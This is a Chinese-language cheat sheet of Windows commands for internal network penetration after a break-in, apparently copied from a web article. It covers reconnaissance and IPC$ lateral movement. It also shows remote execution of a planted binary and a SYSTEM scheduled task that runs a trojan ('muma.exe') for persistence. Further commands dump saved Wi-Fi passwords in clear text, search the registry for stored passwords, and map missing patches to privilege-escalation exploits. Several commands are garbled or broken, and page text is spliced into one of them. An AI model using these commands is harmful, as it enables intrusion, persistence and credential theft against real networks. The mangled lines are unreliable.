2.基本内网渗透命令:
ipconfig/all
//查看IP地址
ipconfig /release
//释放地址
ipconfig /renew
重新获取Ip地址
whoami
//查询账号所属权限
whoami/all
//查看sid值
systeminfo
//查询系统以及补丁信息
tasklist /svc
//查看进程
taskkill /im 进程名称(cmd)
//结束进程
taskkill /pid[进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程)
wmic qfe get hotfixid
//查看已安装过得补丁,这个很实用
wmic qfe list full /format:htable > hotfixes.htm
//详细的补丁安装
wmic qfe
//查询补丁信息以及微软提供的下载地址
ping hostname(主机名)
//显示该机器名的IP
net start
//查看当前运行的服务
net user
//查看本地组的用户
net localhroup administrators
//查看本机管理员组有哪些用户
net user
//查看会话
net session
//查看当前会话
net share
//查看SMB指向的路径[即共享]
wmic share get name,path
//查看SMB指向的路径
wmic nteventlog get path,filename,writeable
//查询系统日志文件存储位置
net use IPipc$ password /user:username
//建立IPC会话(工作组模式)
net use z: 192.168.1.1
//建立映射到本机Z盘
net time 172.16.16.2
//查询共享主机的是
at 172.16.16.2 13:50 c:windows2009.exe
//在共享主机上执行
netstat -ano
//查看开放的端口
netstat -an | find “3389”
//找到3389端口
net accounts
//查看本地密码策略
nbtstat –A ip
//netbiso查询
net view
//查看机器注释或许能得到当前活动状态的机器列表,如果
禁用netbios就查看不出来
echo %PROCESSOR_ARCHITECTURE%
//查看系统是32还是64位
set
//查看系统环境设置变量
net start
//查看当前运行的服务
wmic service list brief
//查看进程服务
wmic process list brief
//查看进程
wmic startup list brief
//查看启动程序信息
wmic product list brief
//查看安装程序和版本信息(漏洞利用线索)
wmic startup list full
//识别开机启动的程序
wmic process where(deion="mysqld.exe")
>>mysql.log
//获取软件安装路径
for /f "skip=9 tokens=1,2 delims=:" %i in ('ne
tsh wlan showprofiles') do @echo %j | findstr
-i -v echo | netsh wlan show profiles %jkey=clear返回搜狐,查看更多
//一键获取wifi密码
if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell)
//查看是否支持posershell
qwinsta
//查看登录情况
schtasks.exe /Create /RU"SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "c:/muma.ex e" /ED 2017/4/7
//添加计划任务
set KB2829361=MS13-046&set KB2830290=MS13-046&setKB2667440=MS12-020&set KB2667402=MS12-020&set KB3124280=MS16-016&setKB3077657=MS15-077&set KB3045171=MS15-051&setKB2592799=MS11-080&set KB952004=MS09-012 PR&set KB956572=MS09-012 巴西烤肉&set KB970483=MS09-020 iis6&set KB2124261=MS10-065 ii7&setKB2271195=MS10-065 ii7&systeminfo>a.txt&(for %i in (KB952004 KB956572KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165KB958644 KB2667402 KB2667440 KB2830290 KB2829361 KB3045171 KB3077657 KB3124280)do @type a.txt|@find /i "%i"||@echo %%i% Not Installed!)&del /f/q /a a.txt
//windows未打补丁情况
REG query HKCU /v "pwd" /s
//获取保存到注册表中的密码